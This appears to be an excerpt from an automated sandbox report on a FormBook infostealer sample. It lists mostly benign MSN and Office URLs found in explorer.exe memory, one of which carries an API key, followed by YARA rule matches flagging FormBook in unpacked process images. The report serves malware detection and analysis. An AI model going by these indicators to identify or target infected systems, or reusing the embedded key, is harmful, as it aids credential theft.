          Source: explorer.exe, 00000004.00000002.2362844940.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288445621.000000000704B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/&WEb(
          Source: explorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/RV9cu
          Source: explorer.exe, 00000010.00000002.2676388545.00000000093EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000000.1465481958.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284166438.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000010.00000003.2437268910.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?6i
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000003.2284166438.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000010.00000003.2435222772.000000000929C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.0000000009277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comK
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: explorer.exe, 00000010.00000002.2678982121.0000000009FA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: explorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2435222772.00000000093CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: explorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000010.00000003.2435222772.0000000009459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.comE
          Source: explorer.exe, 00000010.00000003.2438090528.0000000009465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000010.00000003.2435222772.0000000009459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000004.00000002.2368051152.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1469970738.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/the-no-1-question-to-ask-in-a-job-interview-acco
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000004.00000003.2289617040.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2362602712.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1463910498.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2395726054.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2375541043.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2670266703.0000000004F29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364724226.0000000004F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2364314104.0000000004F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2667218858.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.2682408997.000000000C39C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
